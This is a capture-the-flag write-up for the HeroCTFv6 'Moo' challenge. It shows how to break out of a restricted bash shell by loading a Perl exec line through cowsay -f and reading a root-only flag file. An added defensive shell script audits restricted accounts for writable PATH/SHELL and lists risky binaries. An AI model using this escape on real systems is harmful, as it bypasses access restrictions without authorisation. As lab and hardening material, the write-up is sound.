HeroCTFv6 - Moo

Writeup - Moo

Difficulty : easy

Statement

Just read the flag, it’s all there.

Credentials : user:password

Deploy on deploy.heroctf.fr

  • Format : Hero{flag}
  • Author : Log_s

Solve

ssh [email protected] -p 14912

The authenticity of host '[dyn04.heroctf.fr]:14912 ([172.232.42.224]:14912)' can't be established.
ED25519 key fingerprint is SHA256:8UwtZVfNTvorDdtJPF7cu2Kv3+f80osZROhuWohi46A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[dyn04.heroctf.fr]:14912' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
 ______________________________________________________
/ Welcome dear CTF player! You can read the flag with: \
\ /bin/sudo /bin/cat /flag.txt. Or can you?...         /
 ------------------------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
user@moo:~$ ls -al /flag.txt 
-r-------- 1 root root 22 Oct 25 18:18 /flag.txt

We are in a restricted shell :

user@moo:~$ /bin/cat /flag.txt 
bash: /bin/cat: restricted: cannot specify `/' in command names

We do a little reconnaissance :

user@moo:~$ export -p
declare -x HOME="/home/user"
declare -x LANG="fr_FR.UTF-8"
declare -x LC_ALL="C"
declare -x LOGNAME="user"
declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=00:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.avif=01;35:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:*~=00;90:*#=00;90:*.bak=00;90:*.old=00;90:*.orig=00;90:*.part=00;90:*.rej=00;90:*.swp=00;90:*.tmp=00;90:*.dpkg-dist=00;90:*.dpkg-old=00;90:*.ucf-dist=00;90:*.ucf-new=00;90:*.ucf-old=00;90:*.rpmnew=00;90:*.rpmorig=00;90:*.rpmsave=00;90:"
declare -x MOTD_SHOWN="pam"
declare -x OLDPWD
declare -rx PATH="/usr/local/rbin"
declare -x PWD="/home/user"
declare -rx SHELL="/usr/local/rbin/rbash"
declare -x SHLVL="2"
declare -x SSH_CLIENT="89.81.9.71 40914 22"
declare -x SSH_CONNECTION="89.81.9.71 40914 10.99.48.2 22"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="user"

Look for writable variables. Run export -p to list exported variables. Most of the time SHELL and PATH will be declared -rx, meaning they are read-only (-r) and exported (-x), so they cannot be changed, as is the case here. If they are writable, simply set SHELL to your shell of choice, or PATH to a directory with exploitable commands.

user@moo:~$ echo $0
/bin/bash
user@moo:~$ echo /usr/local/rbin/*
/usr/local/rbin/cowsay /usr/local/rbin/dircolors /usr/local/rbin/ls /usr/local/rbin/rbash /usr/local/rbin/vim

We can execute cowsay and GTFOBins says :

It allows to execute perl code, other functions may apply.

Create a file with vim and place the following text inside :

exec "/bin/sudo /bin/cat /flag.txt";

Then pass this file to cowsay with the -f option :

user@moo:~$ cowsay -f ./file x
Hero{s0m3_s4cr3d_c0w}

Flag : Hero{s0m3_s4cr3d_c0w}
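
Seen from the side of whoever builds such a restricted account, the two checks used in this writeup (are PATH and SHELL read-only, and what is actually in the command directory) can be scripted. The following is an added example, not code from the challenge or its author; the RISKY list, the function names and the "greet" script are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Illustrative, non-exhaustive list (assumption) of programs able to run other
# code. cowsay is the one this page relies on: its -f file is evaluated as Perl.
RISKY="cowsay vim vi perl python3 awk find less man"

# Read `export -p` output (bash format) on stdin and print PATH or SHELL
# when the declaration lacks the readonly "r" flag.
writable_vars() {
    while read -r kw flags rest; do
        [ "$kw" = "declare" ] || continue
        name=${rest%%=*}
        case "$name" in PATH|SHELL) ;; *) continue ;; esac
        case "$flags" in *r*) ;; *) echo "$name" ;; esac
    done
}

# Print each file in directory $1 that is on the list by its own name, by its
# symlink target's name, or by the interpreter named on its "#!" line.
audit_rbin() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        interp=$(head -n 1 "$f" 2>/dev/null | tr -d '\000' |
            sed -n 's|^#! *\([^ ]*/env  *\)\{0,1\}\([^ ]*\).*|\2|p')
        names="$(basename "$f") $(basename "$(readlink -f "$f")") ${interp##*/}"
        for n in $names; do
            case " $RISKY " in *" $n "*) basename "$f"; break ;; esac
        done
    done
}

# Constructed sample: the five names listed on this page plus a hypothetical
# wrapper script "greet", created as placeholder files in a temp directory.
make_sample_rbin() {
    d=$(mktemp -d) || return 1
    for n in cowsay dircolors ls rbash vim; do : > "$d/$n"; done
    printf '#!/usr/bin/env perl\n' > "$d/greet"
    echo "$d"
}

sample=$(make_sample_rbin)
echo "risky entries:"; audit_rbin "$sample"
echo "writable (constructed input with a non-readonly SHELL):"
printf 'declare -rx PATH="/usr/local/rbin"\ndeclare -x SHELL="/bin/bash"\n' | writable_vars
rm -rf "$sample"
```

On the real host, `export -p | writable_vars` and `audit_rbin /usr/local/rbin` would be run from an unrestricted administrative shell.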

